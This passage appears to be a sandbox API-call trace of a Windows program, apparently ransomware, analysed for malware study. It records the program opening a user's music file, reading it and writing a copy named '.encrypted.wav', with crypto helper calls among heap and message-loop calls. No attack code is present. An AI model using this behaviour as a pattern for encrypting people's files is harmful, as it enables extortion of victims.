lpMsg=0x6ae83c) returned 0 [0039.145] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.145] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.145] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.146] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.146] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.146] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0039.146] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.146] CryptDestroyHash (hHash=0x7c2240) returned 1 [0039.146] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.146] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.146] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.146] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.146] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.146] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc\\wioex9t.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.146] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.146] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0039.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0039.146] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0039.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0039.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.146] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0039.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.147] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0039.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0039.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0039.147] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0039.147] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0039.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0039.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0039.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0039.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0039.147] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.147] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0039.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0039.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0039.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0039.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0039.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0039.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0039.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0039.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0039.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0039.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0039.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0039.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0039.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0039.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0039.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0039.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0039.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0039.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0039.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.148] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0039.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0039.149] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc")) returned 0x10 [0039.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0039.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0039.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0039.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0039.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0039.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0039.149] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\wiOEx9T.encrypted.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc\\wioex9t.encrypted.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0039.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0039.149] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0039.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0039.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0039.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.149] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0039.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0039.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0039.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0039.150] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0039.150] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0039.150] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0039.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0039.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0039.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.150] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0039.150] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0039.151] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0039.151] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0039.153] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x12e1, lpOverlapped=0x0) returned 1 [0039.153] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0039.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0039.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.153] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x112e1) returned 0xac0018 [0039.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0039.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0039.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0039.154] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0039.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0039.154] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x112e1) returned 0xad1308 [0039.155] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0039.157] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.157] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0039.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.157] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x112e1) returned 0xac0018 [0039.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac0018 | out: hHeap=0x770000) returned 1 [0039.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0039.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.158] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0039.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.158] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0039.158] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0039.158] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.158] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0039.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x112e1) returned 0xac0018 [0039.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0039.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0039.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0039.159] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca30 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0039.159] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x112e1) returned 0x935008 [0039.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0039.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0039.161] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0039.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0039.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0039.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0039.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0039.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0039.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0039.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0039.161] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0039.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0039.162] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0039.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0039.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0039.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0039.162] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0039.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0039.162] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0039.162] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 